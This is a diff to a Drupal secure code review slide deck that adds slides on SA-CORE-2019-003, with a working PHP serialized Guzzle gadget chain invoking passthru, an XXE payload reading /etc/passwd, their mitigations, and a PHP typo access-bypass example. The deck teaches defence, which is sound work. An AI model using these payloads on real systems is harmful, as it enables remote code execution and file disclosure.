--- a/index.html
+++ b/index.html
@@ -410,7 +410,7 @@
             * `if ($accessResult())`
             * will always be TRUE because it is an object and true-ish!
             * for access checks always use
-            * `if ($accessResult()->isAllowed())`
+            * `if ($accessResult->isAllowed())`
         </textarea>
       </section>
 
@@ -523,10 +523,224 @@
 
       <section data-markdown>
         <textarea data-template data-separator-notes="^Note:">
+        ## SA-CORE-2019-003
+
+        unserialize() executed on user provided data
+
+        ```
+        GET /drupal-8.6.9/node/1?_format=hal_json HTTP/1.1
+        ```
+        ```json
+        {
+          "link": [
+            {
+              "value": "link",
+              "options": "<evil serialized payload>"
+            }
+          ],
+          "_links": {
+            "type": {
+              "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"
+            }
+          }
+        }
+        ```
+
+        Note:
+        * Only exploitable if REST module and REST resources enabled
+        </textarea>
+      </section>
+
+      <section data-markdown>
+        <textarea data-template data-separator-notes="^Note:">
+        ## Evil unserialize() payload
+
+        <pre>
+        "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:"
+        . "{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";"
+        . "a:1:{s:5:\"close\";a:2:{i:0;"
+        . "O:23:\"GuzzleHttp\\HandlerStack\":3:"
+        . "{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";"
+        . "s:12:\"echo HACKED!\";"
+        . "s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";"
+        . "a:1:{i:0;a:1:{i:0;s:8:\"passthru\";}}"
+        . "s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";"
+        . "b:0;}i:1;"
+        . "s:7:\"resolve\";}}s:9:\"_fn_close\";"
+        . "a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
+        </pre>
+
+        Note:
+        * Source: https://www.ambionics.io/blog/drupal8-rce
+        * PHPGGC: https://github.com/ambionics/phpggc
+        </textarea>
+      </section>
+
+      <section data-markdown>
+        <textarea data-template data-separator-notes="^Note:">
+          ## unserialize() correctly
+
+          * never pass user provided data to unserialize().
+          * Mitigation:
+          ```php
+          unserialize($values, ['allowed_classes' => FALSE]);
+          ```
+          * Carefully examine how unserialize() is used.
+
+          [OWASP A8-Insecure Deserialization](https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization)
+
+          Note:
+          * the 'allowed_classes' parameter only exists since PHP 7.
+        </textarea>
+      </section>
+
+      <section data-markdown>
+        <textarea data-template data-separator-notes="^Note:">
+          ## XML External Entities attacks
+
+          ```php
+          $parsed = simplexml_load_string($user_provided);
+          ```
+          Attack:
+          ```xml
+          <?xml version="1.0" encoding="ISO-8859-1"?>
+
+          <!DOCTYPE foo [
+          <!ELEMENT foo ANY >
+          <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+          <foo>&xxe;</foo>
+          ```
+
+          [OWASP A4-XML External Entities (XXE)](https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XXE))
+        </textarea>
+      </section>
+
+      <section data-markdown>
+        <textarea data-template data-separator-notes="^Note:">
+          ## Mitigating XEE
+
+          ```php
+          libxml_disable_entity_loader(TRUE);
+          $parsed = simplexml_load_string($user_provided);
+          ```
+          * Disable entity expansion before parsing XML.
+
+        </textarea>
+      </section>
+
+      <section data-markdown>
+        <textarea data-template data-separator-notes="^Note:">
+          ## Full Code Review Rundown
+
+          1. Entry points (Routing Access Control, CSRF)
+          2. Input validation (Controllers, Injection, XEE, Deserialization)
+          3. Output sanitization (Templates, Theming, XSS)
+          4. Access Control (access logic in hooks/controllers)
+          5. Read through the rest
+
+          Attacker mindset: how could the code be abused?
+
+        </textarea>
+      </section>
+
+      <section data-markdown>
+        <textarea data-template data-separator-notes="^Note:">
             ## Resources
 
             * [OWASP Code Review Guide](https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project)
+            * [OWASP Top Ten security risks](https://www.owasp.org/index.php/Category:OWASP_Top_Ten_2017_Project)
             * [Drupal 8: Writing Secure Code](https://www.drupal.org/docs/8/security/writing-secure-code-for-drupal-8)
+            * [Drupal security coverage applications](https://www.drupal.org/project/projectapplications)
+        </textarea>
+      </section>
+
+      <section data-markdown>
+        <textarea data-template data-separator-notes="^Note:">
+          # Questions?
+
+          Klaus Purer, [jobiqo.com](https://www.jobiqo.com)
+
+            [drupal.org/u/klausi](https://www.drupal.org/u/klausi)
+
+            <p>
+            <a href="https://mastodon.social/@klausi">
+            <svg class="svg-icon" viewBox="0 0 216.4144 232.00976">
+                <path fill="#2b90d9" d="M211.80734 139.0875c-3.18125 16.36625-28.4925 34.2775-57.5625 37.74875-15.15875 1.80875-30.08375 3.47125-45.99875 2.74125-26.0275-1.1925-46.565-6.2125-46.565-6.2125 0 2.53375.15625 4.94625.46875 7.2025 3.38375 25.68625 25.47 27.225 46.39125 27.9425 21.11625.7225 39.91875-5.20625 39.91875-5.20625l.8675 19.09s-14.77 7.93125-41.08125 9.39c-14.50875.7975-32.52375-.365-53.50625-5.91875C9.23234 213.82 1.40609 165.31125.20859 116.09125c-.365-14.61375-.14-28.39375-.14-39.91875 0-50.33 32.97625-65.0825 32.97625-65.0825C49.67234 3.45375 78.20359.2425 107.86484 0h.72875c29.66125.2425 58.21125 3.45375 74.8375 11.09 0 0 32.975 14.7525 32.975 65.0825 0 0 .41375 37.13375-4.59875 62.915"/>
+                <path fill="#fff" d="M177.50984 80.077v60.94125h-24.14375v-59.15c0-12.46875-5.24625-18.7975-15.74-18.7975-11.6025 0-17.4175 7.5075-17.4175 22.3525v32.37625H96.20734V85.42325c0-14.845-5.81625-22.3525-17.41875-22.3525-10.49375 0-15.74 6.32875-15.74 18.7975v59.15H38.90484V80.077c0-12.455 3.17125-22.3525 9.54125-29.675 6.56875-7.3225 15.17125-11.07625 25.85-11.07625 12.355 0 21.71125 4.74875 27.8975 14.2475l6.01375 10.08125 6.015-10.08125c6.185-9.49875 15.54125-14.2475 27.8975-14.2475 10.6775 0 19.28 3.75375 25.85 11.07625 6.36875 7.3225 9.54 17.22 9.54 29.675"/>
+              </svg>
+              klausi@mastodon.social
+            </a>
+            </p>
+
+            <a href="https://twitter.com/_klausi_">
+              <svg class="svg-icon" viewBox="0 0 400 400"><defs><style>.cls-1{fill:none;}.cls-2{fill:#1da1f2;}</style></defs><title>Twitter_Logo_Blue</title><rect class="cls-1" width="400" height="400"/><path class="cls-2" d="M153.62,301.59c94.34,0,145.94-78.16,145.94-145.94,0-2.22,0-4.43-.15-6.63A104.36,104.36,0,0,0,325,122.47a102.38,102.38,0,0,1-29.46,8.07,51.47,51.47,0,0,0,22.55-28.37,102.79,102.79,0,0,1-32.57,12.45,51.34,51.34,0,0,0-87.41,46.78A145.62,145.62,0,0,1,92.4,107.81a51.33,51.33,0,0,0,15.88,68.47A50.91,50.91,0,0,1,85,169.86c0,.21,0,.43,0,.65a51.31,51.31,0,0,0,41.15,50.28,51.21,51.21,0,0,1-23.16.88,51.35,51.35,0,0,0,47.92,35.62,102.92,102.92,0,0,1-63.7,22A104.41,104.41,0,0,1,75,278.55a145.21,145.21,0,0,0,78.62,23"/></svg>
+              twitter.com/_klausi_
+            </a>
+        </textarea>
+      </section>
+
+      <section data-markdown>
+        <textarea data-template data-separator-notes="^Note:">
+            # Bonus slides
+        </textarea>
+      </section>
+
+      <section data-markdown>
+        <textarea data-template data-separator-notes="^Note:">
+        ## PHP language fails
+
+        Access Bypass because of a typo
+
+        ```php
+        function checkSharedKey($shared_key) {
+          if (strlen($shared_key) != 32) {
+            return false;
+          }
+          if (trim($shared_key) == "") {
+            return flase;
+          }
+        …
+        }
+        ```
+        <pre>
+        Warning: Use of undefined constant flase - assumed 'flase'
+        (this will throw an Error in a future version of PHP)
+        </pre>
+
+        Note:
+        * Example source: https://medium.com/@DanielC7/remote-code-execution-gaining-domain-admin-privileges-due-to-a-typo-dbf8773df767
+        * PHP issues a warning, but the function will return a truthy value
+        * If you don't compare that with "===" then you get an access bypass
+        </textarea>
+      </section>
+
+      <section data-markdown>
+        <textarea data-template data-separator-notes="^Note:">
+        ## PHP type hinting as security protection
+
+        Use declare() and a return type hint:
+
+        ```php
+        declare(strict_types=1);
+
+        function checkSharedKey($shared_key): bool {
+          if (strlen($shared_key) != 32) {
+            return false;
+          }
+          if (trim($shared_key) == "") {
+            return flase;
+          }
+        …
+        }
+        ```
+        <pre>
+        Fatal error: Uncaught TypeError: Return value of checkSharedKey()
+        must be of the type bool, string returned
+        </pre>
+
+        Note:
+        * Instead of a warning we get a fatal error now with this
+        * code execution will stop and the typo cannot be exploited.
         </textarea>
       </section>
 
